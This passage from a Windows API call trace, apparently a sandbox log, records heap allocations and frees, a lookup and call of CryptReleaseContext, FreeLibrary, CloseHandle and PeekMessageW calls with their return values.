0x43ca730 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0075.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0075.564] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0075.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0075.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.564] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0075.566] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0075.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0075.566] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.567] FreeLibrary (hLibModule=0x756e0000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.567] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0075.567] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.567] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.567] CloseHandle (hObject=0x298) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.568] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0075.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.569] CloseHandle (hObject=0x258) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb3b0 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0075.571] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0075.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0075.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.573] RtlAllocateHeap 